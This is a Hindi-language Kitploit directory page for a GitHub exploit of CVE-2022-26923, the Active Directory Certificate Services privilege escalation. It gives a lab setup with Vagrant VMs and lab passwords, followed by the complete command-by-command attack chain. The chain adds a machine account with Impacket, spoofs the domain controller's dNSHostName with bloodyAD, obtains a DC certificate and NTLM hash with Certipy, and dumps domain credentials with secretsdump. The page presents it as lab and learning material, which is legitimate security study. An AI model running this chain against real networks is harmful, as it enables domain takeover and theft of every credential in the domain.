Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26923-rayng — CVE-2022-26923 के लिए शोषण | Kitploit
उपकरण/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

CVE-2022-26923 के लिए शोषण

रिपॉजिटरी देखें
41 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26923 का शोषण: प्रमाणपत्र प्राधिकरण विशेषाधिकार उन्नयन

अवलोकन

CVE-2022-26923 सक्रिय निर्देशिका प्रमाणपत्र सेवाओं (AD CS) में एक भेद्यता है जो एक हमलावर को प्रमाणपत्र-आधारित प्रमाणीकरण का दुरुपयोग करके विशेषाधिकार बढ़ाने की अनुमति देती है। यह मार्गदर्शिका Impacket और Certipy का उपयोग करके इस भेद्यता का शोषण करने के चरणों की रूपरेखा प्रस्तुत करती है।


क्रेडेंशियल्स तालिका

वर्चुअल मशीनउपयोगकर्ता नामपासवर्ड
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

चरण 1: रिपॉजिटरी क्लोन करें और वर्चुअल मशीनें सेट अप करें

सबसे पहले, आवश्यक फ़ाइलों वाली रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

वर्चुअल मशीनें सेट अप करें

रिपॉजिटरी में दो फ़ोल्डर हैं, प्रत्येक में वर्चुअल मशीनों को प्रावधान करने के लिए एक Vagrantfile है। आगे बढ़ने से पहले आपको अपने होस्ट मशीन पर Vagrant इंस्टॉल करना होगा।

Vagrant इंस्टॉल करें

Windows के लिए

Vagrant को यहाँ से डाउनलोड और इंस्टॉल करें। या PowerShell का उपयोग करके इंस्टॉल करें:

root@kitploit:~
choco install vagrant
Linux के लिए
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Windows Server 2022 VM

WindowsServer2022 निर्देशिका में नेविगेट करें:

root@kitploit:~
cd WindowsServer2022
vagrant up

यह VirtualBox में Windows Server 2022 VM को डाउनलोड और सेट अप करेगा।

Kali Linux VM

Kali-LinuxVM निर्देशिका में नेविगेट करें:

root@kitploit:~
cd Kali-LinuxVM
vagrant up

चरण 2: वर्चुअल नेटवर्क कॉन्फ़िगर करें

चूंकि शोषण के लिए NAT नेटवर्क की आवश्यकता होती है, VirtualBox को निम्नानुसार कॉन्फ़िगर करें:

Windows पर

नीचे दिया गया कमांड चलाने से पहले, सुनिश्चित करें कि VBoxManage आपके पर्यावरण चर में जोड़ा गया है। यदि नहीं, तो कमांड को उसके पूर्ण पथ का उपयोग करके निष्पादित करें:

NAT नेटवर्क जोड़ना

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

यदि VBoxManage पहचाना नहीं जाता है, तो उपयोग करें:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Linux पर

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

सुनिश्चित करें कि VirtualBox में दोनों VM की जाँच करें और वे नेटवर्क एडाप्टर NatNetwork - NatNet1 को सौंपे गए हैं।

आप एक अलग नाम के साथ NAT नेटवर्क बना सकते हैं, लेकिन यह IP रेंज 10.0.2.0/24 में होना चाहिए।

चरण 3: होस्ट्स फ़ाइल संशोधित करें

आगे बढ़ने से पहले, सुनिश्चित करें कि Windows Server 2022 और Kali Linux VM दोनों चालू हैं।

हमला शुरू करने के लिए Kali Linux VM तक पहुँचें।

डोमेन कंट्रोलर के IP को मैप करने के लिए अपनी /etc/hosts फ़ाइल अपडेट करें:

root@kitploit:~
sudo nano /etc/hosts

निम्नलिखित प्रविष्टि जोड़ें:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

सहेजें और बाहर निकलें।


चरण 4: पर्यावरण सेट अप करें

CVE-26923 निर्देशिका में नेविगेट करें और Python वर्चुअल वातावरण सक्रिय करें:

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

चरण 5: डोमेन में एक कंप्यूटर जोड़ें

Impacket के addcomputer उपयोगिता का उपयोग करके:

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

चरण 6: PCTEST1 को डोमेन कंट्रोलर को असाइन करें

विधि 1: SSH का उपयोग करके (यदि लक्ष्य सर्वर पर OpenSSH इंस्टॉल है)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

विधि 2: SSH के बिना (Impacket और BloodyAD का उपयोग करके)

डोमेन कंप्यूटरों की जाँच करें:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

bloodyAD निर्देशिका में नेविगेट करें और PCTEST1 को डोमेन में जोड़ने के लिए bloodyAD.py का उपयोग करें:

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

सत्यापित करें कि PCTEST1 को डोमेन को सौंपा गया है:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

चरण 7: शोषण प्रक्रिया

भेद्य प्रमाणपत्र खोजना

भेद्य प्रमाणपत्र खोजने के लिए Certipy का उपयोग करें:

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

प्रमाणपत्र का अनुरोध करना

Certipy का उपयोग करके एक मशीन प्रमाणपत्र का अनुरोध करें:

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

प्रमाणपत्र के साथ प्रमाणीकरण

प्राप्त प्रमाणपत्र का उपयोग करके प्रमाणीकरण करें:

root@kitploit:~
certipy auth -pfx server2022.pfx

चरण 8: NTLM हैश निकालना

certipy auth कमांड चलाने के बाद, दो हैश प्रदर्शित होंगे। NTLM प्रमाणीकरण के लिए दाईं ओर वाले हैश का उपयोग किया जाएगा।

उदाहरण हैश आउटपुट:

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

क्रेडेंशियल्स डंप करने के लिए निकाले गए NTLM हैश का उपयोग करें:

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

यह CVE-2022-26923 के शोषण के लिए पूरी हमले की श्रृंखला को पूरा करता है।

टूल डाउनलोड करें